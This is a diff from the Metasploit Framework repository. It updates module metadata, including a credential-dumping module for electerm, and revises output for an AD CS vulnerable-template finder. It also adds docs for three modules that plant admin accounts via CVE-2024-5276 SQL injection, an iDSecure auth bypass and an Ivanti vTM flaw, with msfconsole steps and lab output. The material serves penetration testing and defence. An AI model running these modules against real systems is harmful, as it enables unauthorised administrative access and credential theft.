+    "ref_name": "windows/scada/mypro_cmdexe",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/scada/procyon_core_server": {
    "name": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow",
    "fullname": "exploit/windows/scada/procyon_core_server",
@@ -201276,7 +202391,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-08-01 15:02:11 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_aws_instance_connect.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_aws_instance_connect",
@@ -231182,7 +232297,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-08-01 15:02:11 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/payloads/singles/generic/shell_bind_aws_ssm.rb",
    "is_install_path": true,
    "ref_name": "generic/shell_bind_aws_ssm",
@@ -231290,7 +232405,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-11-05 09:43:48 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/payloads/singles/generic/ssh/interact.rb",
    "is_install_path": true,
    "ref_name": "generic/ssh/interact",
@@ -253676,7 +254791,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-06-28 10:36:35 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/linux/gather/apache_nifi_credentials.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/apache_nifi_credentials",
@@ -253764,7 +254879,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module attempts to determine whether the system is running\n          inside of a virtual environment and if so, which one. This\n          module supports detection of Hyper-V, VMWare, VirtualBox, Xen,\n          and QEMU/KVM.",
+    "description": "This module attempts to determine whether the system is running\n          inside of a virtual environment and if so, which one. This\n          module supports detection of Hyper-V, VMWare, VirtualBox, Xen,\n          Bhyve and QEMU/KVM.",
    "references": [

    ],
@@ -253774,7 +254889,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-08-22 12:36:48 +0000",
+    "mod_time": "2024-08-22 23:19:09 +0000",
    "path": "/modules/post/linux/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkvm",
@@ -255656,7 +256771,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-01-11 20:00:09 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/multi/gather/dbeaver.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/dbeaver",
@@ -255883,6 +256998,56 @@

    ]
  },
+  "post_multi/gather/electerm": {
+    "name": "Gather electerm Passwords",
+    "fullname": "post/multi/gather/electerm",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Kali-Team <kali-team@qq.com>"
+    ],
+    "description": "This module will determine if electerm is installed on the target system and, if it is, it will try to\n          dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n          where possible.",
+    "references": [
+      "URL-https://blog.kali-team.cn/metasploit-electerm-6854f3d868eb45eab6951acc463a910d"
+    ],
+    "platform": "Linux,OSX,Unix,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-08-22 22:28:01 +0000",
+    "path": "/modules/post/multi/gather/electerm.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/electerm",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell",
+      "powershell"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_multi/gather/enum_hexchat": {
    "name": "Linux Gather HexChat/XChat Enumeration",
    "fullname": "post/multi/gather/enum_hexchat",
@@ -256471,7 +257636,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2024-06-06 14:53:28 +0000",
    "path": "/modules/post/multi/gather/lastpass_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/lastpass_creds",
@@ -257046,7 +258211,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-12-23 13:52:52 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/multi/gather/saltstack_salt.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/saltstack_salt",
@@ -262614,7 +263779,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-10-06 01:39:28 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/moba_xterm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/moba_xterm",
@@ -263541,7 +264706,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/securecrt.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/securecrt",
@@ -263714,7 +264879,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-12-20 08:55:19 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/solarwinds_orion_dump",
@@ -264362,7 +265527,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-01-18 14:27:28 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/veeam_credential_dump",
@@ -264521,7 +265686,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-23 16:34:43 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/whatsupgold_credential_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/whatsupgold_credential_dump",
@@ -266358,7 +267523,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/enum_onedrive.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_onedrive",
@@ -268261,7 +269426,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/manage/add_user.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/add_user",
@@ -76,8 +76,8 @@ GEM
    rb-fsevent (0.11.2)
    rb-inotify (0.10.1)
      ffi (~> 1.0)
-    rexml (3.2.7)
-      strscan (>= 3.0.9)
+    rexml (3.3.6)
+      strscan
    rouge (4.0.0)
    safe_yaml (1.0.5)
    sassc (2.4.0)
@@ -190,17 +190,19 @@ msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options

 Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):

-   Name                  Current Setting  Required  Description
-   ----                  ---------------  --------  -----------
-   BASE_DN                                no        LDAP base DN if you already have it
-   DOMAIN                                 no        The domain to authenticate to
-   PASSWORD                               no        The password to authenticate with
-   REPORT_NONENROLLABLE  false            yes       Report nonenrollable certificate templates
-   RHOSTS                                 yes       The target host(s), see https://github.com/rapid7/metasploit
-                                                    -framework/wiki/Using-Metasploit
-   RPORT                 389              yes       The target port
-   SSL                   false            no        Enable SSL on the LDAP connection
-   USERNAME                               no        The username to authenticate with
+   Name                   Current Setting  Required  Description
+   ----                   ---------------  --------  -----------
+   BASE_DN                                 no        LDAP base DN if you already have it
+   DOMAIN                                  no        The domain to authenticate to
+   PASSWORD                                no        The password to authenticate with
+   REPORT_NONENROLLABLE   false            yes       Report nonenrollable certificate templates
+   REPORT_PRIVENROLLABLE  false            yes       Report certificate templates restricted to domain
+                                                      and enterprise admin
+   RHOSTS                                  yes       The target host(s), see https://github.com/rapid7/metasploit
+                                                     -framework/wiki/Using-Metasploit
+   RPORT                  389              yes       The target port
+   SSL                    false            no        Enable SSL on the LDAP connection
+   USERNAME                                no        The username to authenticate with


 View the full module info with the info, or info -d command.
@@ -218,114 +220,81 @@ msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run

 [*] Discovering base DN automatically
 [+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
-[*] Template: SubCA
-[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC1-Template
-[*]    Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC2-Template
-[*]    Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC3-Template1
-[*]    Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_1
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: User
-[*]    Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: Administrator
-[*]    Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: Machine
-[*]    Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: DomainController
-[*]    Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-498 (Enterprise Read-only Domain Controllers)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-516 (Domain Controllers)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]       * S-1-5-9 (Enterprise Domain Controllers)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*] Template: ESC3-Template2
-[*]    Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
-[*]    Vulnerable to: ESC3_TEMPLATE_2
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
-[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * daforest-WIN-BR0CCBA815B-CA
-[*]          Server: WIN-BR0CCBA815B.daforest.com
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
+[+] Template: ESC1-Template
+[*]   Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[+]   Vulnerable to: ESC1
+[*]   Notes: ESC1: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag)
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[+]   Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com)
+[*]     Enrollment SIDs:
+[*]       * S-1-5-11 (Authenticated Users)
+[+] Template: ESC2-Template
+[*]   Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[+]   Vulnerable to: ESC2
+[*]   Notes: ESC2: Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage)
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[+]   Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com)
+[*]     Enrollment SIDs:
+[*]       * S-1-5-11 (Authenticated Users)
+[+] Template: ESC3-Template1
+[*]   Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[+]   Vulnerable to: ESC3_TEMPLATE_1
+[*]   Notes: ESC3: Template defines the Certificate Request Agent OID (PkiExtendedKeyUsage)
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[+]   Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com)
+[*]     Enrollment SIDs:
+[*]       * S-1-5-11 (Authenticated Users)
+[+] Template: User
+[*]   Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[+]   Vulnerable to: ESC3_TEMPLATE_2
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[+]   Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com)
+[*]     Enrollment SIDs:
+[*]       * S-1-5-11 (Authenticated Users)
+[+] Template: Machine
+[*]   Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[+]   Vulnerable to: ESC3_TEMPLATE_2
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[+]   Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com)
+[*]     Enrollment SIDs:
+[*]       * S-1-5-11 (Authenticated Users)
+[+] Template: ESC3-Template2
+[*]   Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[+]   Vulnerable to: ESC3_TEMPLATE_2
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]     * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[+]   Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com)
+[*]     Enrollment SIDs:
+[*]       * S-1-5-11 (Authenticated Users)
 [*] Auxiliary module execution completed
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
 ```
@@ -893,21 +862,21 @@ ESC13-Test template is vulenerable to ESC13 and will yield a ticket including th
 ```
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
 ...
-[*] Template: ESC13-Test
-[*]    Distinguished Name: CN=ESC13-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
-[*]    Vulnerable to: ESC13
-[*]    Notes: ESC13 groups: ESC13-Group
-[*]    Certificate Template Enrollment SIDs:
-[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
-[*]       * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
+[+] Template: ESC13-Test
+[*]   Distinguished Name: CN=ESC13-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[+]   Vulnerable to: ESC13
+[*]   Notes: ESC13 groups: ESC13-Group
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
+[*]     * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
+[*]     * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
+[+]   Issuing CA: collalabs1-SRV-ADDS01-CA (SRV-ADDS01.collalabs1.local)
+[*]     Enrollment SIDs:
+[*]       * S-1-5-11 (Authenticated Users)
 [*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
-[*]    Issuing CAs:
-[*]       * collalabs1-SRV-ADDS01-CA
-[*]          Server: SRV-ADDS01.collalabs1.local
-[*]          Enrollment SIDs:
-[*]             * S-1-5-11 (Authenticated Users)
-[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
-[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
+[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
 ```

 In this case, the ticket can be issued with the `icpr_cert` module. No additional options are required to issue the
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+This module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135 (CVE-2024-5276), by adding a new
+administrative user to the web interface of the application.
+
+The vendor published an advisory [here]
+(https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0)
+and [here](https://www.fortra.com/security/advisories/product-security/fi-2024-008).
+
+The advisory from Tenable is available [here](https://www.tenable.com/security/research/tra-2024-25).
+
+## Testing
+
+The software can be obtained from the [vendor](https://www.goanywhere.com/products/filecatalyst/trial).
+
+Deploy it by following the vendor's [installation guide]
+(https://filecatalyst.software/public/filecatalyst/Workflow/5.1.6.139/FileCatalyst_Web_Tomcat_Installation.pdf).
+
+**Successfully tested on**
+
+- Fortra FileCatalyst Workflow v5.1.6 (Build 135) on Windows 10 22H2
+- Fortra FileCatalyst Workflow v5.1.6 (Build 135) on Ubuntu 24.04 LTS
+
+## Verification Steps
+
+1. Deploy Fortra FileCatalyst Workflow <= v5.1.6 Build 135
+2. Start `msfconsole`
+3. `use auxiliary/admin/http/fortra_filecatalyst_workflow_sqli`
+4. `set RHOSTS <IP>`
+5. `set RPORT <PORT>`
+6. `set TARGETURI <URI>`
+7. `set NEW_USERNAME <username>`
+8. `set NEW_PASSWORD <password>`
+9. `run`
+10. A new admin user should have been successfully added.
+
+## Options
+
+### NEW_USERNAME
+Username to be used when creating a new user with admin privileges.
+
+### NEW_PASSWORD
+Password to be used when creating a new user with admin privileges.
+
+### NEW_EMAIL
+E-mail to be used when creating a new user with admin privileges.
+
+## Scenarios
+
+Running the module against FileCatalyst Workflow v5.1.6 (Build 135) on either Windows 10 22H2 or Ubuntu 24.04 LTS should result in an output
+similar to the following:
+
+```
+msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
+[*] Running module against 192.168.137.195
+
+[*] Starting SQL injection workflow...
+[+] Server reachable.
+[*] JSESSIONID value: CBD945F52F91E0F4354296C939BDABDE
+[*] FCWEB.FORM.TOKEN value: IvHIPuxllBiHOfXzLlaS
+[*] Redirect #1: /workflow/createNewJob.do?.rnd2=3324035&FCWEB.FORM.TOKEN=IvHIPuxllBiHOfXzLlaS
+[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=3324040&FCWEB.FORM.TOKEN=IvHIPuxllBiHOfXzLlaS
+[*] Received expected response.
+[+] SQL injection successful!
+[*] Confirming credentials...
+[*] FCWEB.FORM.TOKEN value: IvHIPuxllBiHOfXzLlaS
+[+] Login successful!
+[+] New admin user was successfully injected:
+	elroy:yodTwsPs
+[+] Login at: http://192.168.137.195:8080/workflow/jsp/logon.jsp
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+This module exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. It allows an
+unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.
+
+The advisory from Tenable is available [here](https://www.tenable.com/security/research/tra-2023-36), which lists the affected version
+4.7.32.0. According to the Solution section, the vendor has not responded to the contact attempts from Tenable. While creating this MSF
+module, the latest version available was 4.7.43.0, which was confirmed to be still vulnerable.
+
+## Testing
+
+The software can be obtained from the [vendor](https://www.controlid.com.br/suporte/idsecure).
+
+Deploy it by following the vendor's [documentation](https://www.controlid.com.br/docs/idsecure-en/).
+
+**Successfully tested on**
+
+- Control iD iDSecure v4.7.43.0 on Windows 10 22H2
+- Control iD iDSecure v4.7.32.0 on Windows 10 22H2
+
+## Verification Steps
+
+1. Deploy Control iD iDSecure v4.7.43.0
+2. Start `msfconsole`
+3. `use auxiliary/admin/http/idsecure_auth_bypass`
+4. `set RHOSTS <IP>`
+5. `run`
+6. A new administrative user should have been added to the web interface of the product.
+
+## Options
+
+### NEW_USER
+The name of the new administrative user.
+
+### NEW_PASSWORD
+The password of the new administrative user.
+
+## Scenarios
+
+Running the module against Control iD iDSecure v4.7.43.0 should result in an output
+similar to the following:
+
+```
+msf6 > use auxiliary/admin/http/idsecure_auth_bypass
+msf6 auxiliary(admin/http/idsecure_auth_bypass) > set RHOSTS 192.168.137.196
+[*] Running module against 192.168.137.196
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Version retrieved: 4.7.43.0
+[+] The target appears to be vulnerable.
+[+] Retrieved passwordRandom: <redacted>
+[+] Retrieved serial: <redacted>
+[*] Created passwordCustom: <redacted>
+[+] Retrieved JWT accessToken: <redacted>
+[+] New user 'h4x0r:Sup3rS3cr3t!' was successfully added.
+[+] Login at: https://192.168.137.196:30443/#/login
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,65 @@
+## Vulnerable Application
+
+This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new
+administrative user to the web interface of the application.
+
+Affected versions include:
+* 22.7R1
+* 22.6R1
+* 22.5R1
+* 22.3R2
+* 22.3
+* 22.2
+
+The vendor published an advisory [here]
+(https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US).
+
+A proof-of-concept is available [here](https://packetstormsecurity.com/files/179906).
+
+## Testing
+
+Docker images with the software are available from [here](https://hubgw.docker.com/r/pulsesecure/vtm).
+
+**Successfully tested on**
+
+- 22.7R1 on Ubuntu 20.04.6 LTS
+- 22.6R1 on Ubuntu 20.04.6 LTS
+- 22.5R1 on Ubuntu 20.04.6 LTS
+- 22.3R1 on Ubuntu 20.04.5 LTS
+- 22.2 on Ubuntu 20.04.4 LTS
+
+## Verification Steps
+
+1. Deploy Ivanti Virtual Traffic Manager (vTM)
+2. Start `msfconsole`
+3. `use auxiliary/admin/http/ivanti_vtm_admin`
+4. `set RHOSTS <IP>`
+5. `run`
+6. A new admin user should have been added to the web interface.
+
+## Options
+
+### NEW_USERNAME
+Username to be used when creating a new user with admin privileges.
+
+### NEW_PASSWORD
+Password to be used when creating a new user with admin privileges.
+
+## Scenarios
+
+Running the module against Virtual Traffic Manager (vTM) 22.7R1 should result in an output
+similar to the following:
+
+```
+msf6 > use auxiliary/admin/http/ivanti_vtm_admin 
+msf6 auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
+msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit 
+[*] Running module against 172.17.0.2
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version: 22.7R1
+[+] New admin user was successfully added:
+	h4x0r:w00Tw00T!
+[+] Login at: https://172.17.0.2:9090/apps/zxtm/login.cgi
+[*] Auxiliary module execution completed
+```
@@ -95,358 +95,49 @@ If set to `True` then report any certificate templates that are vulnerable but w
 If set to `False` then skip over these certificate templates and only report on certificate templates
 that are both vulnerable and enrollable.

+### REPORT_PRIVENROLLABLE
+If set to `True` then report certificate templates that are only enrollable by the Domain and Enterprise Admins groups.
